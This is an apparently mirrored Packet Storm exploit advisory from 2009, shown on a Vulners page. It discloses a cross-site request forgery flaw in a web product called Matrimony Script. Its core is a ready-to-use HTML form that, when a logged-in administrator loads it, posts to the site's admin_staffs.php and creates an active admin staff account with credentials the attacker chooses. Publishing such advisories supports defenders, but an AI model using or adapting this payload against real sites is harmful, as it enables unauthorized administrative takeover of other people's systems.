Lucene search
K

Matrimony Script XSRF

🗓️ 17 Dec 2009 00:00:00Reported by bi0Type 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 27 Views

Matrimony Script CSRF Vulnerability, Create new Admin Staff using CSR

Code
` ______ __ ______  
/\ == \ /\ \ /\ __ \  
\ \ __< \ \ \ \ \ \/\ \  
\ \_____\ \ \_\ \ \_____\  
\/_____/ \/_/ \/_____/  
  
01000010 01101001 01001111  
  
[#]----------------------------------------------------------------[#]  
#  
# [+] Matrimony Script CSRF Vulnerability  
#  
# // Author Info  
# [x] Author: bi0  
# [x] Contact: [email protected]  
# [x] Thanks: sp1r1t,packetdeath,Zer0flag,redking and all my friends  
# [x] Irc : irc.freenode.net / #security-shell  
# [*] Note : R.I.P Rock4eveR,We`ll never forget you !  
#  
[#]-------------------------------------------------------------------------------------------[#]  
#  
# [x] Exploit :  
#  
# // CSRF to Create new Admin Staff  
#  
#================================================================#  
<html>  
<body>  
<!-- Create new Admin Staff -->  
<form action="http://[server]/admin/admin_staffs.php" method="post">  
<input name="name" type="text" id="name" value="name">  
<input name="username" type="text" class="forminput" id="username" value="user">  
<input name="pass" type="text" id="pass" value="pass">  
<input name="email" type="text" id="email" value="[email protected]">  
<input type="hidden" id="status" value="Active" name="status" >  
<input name="Submit" type="submit" class="button" value="Create Staff">  
</body>  
</html>  
#================================================================#  
#  
#  
[#]------------------------------------------------------------------------------------------[#]  
  
  
#EOF  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 Dec 2009 00:00Current
0.3Low risk
Vulners AI Score0.3
27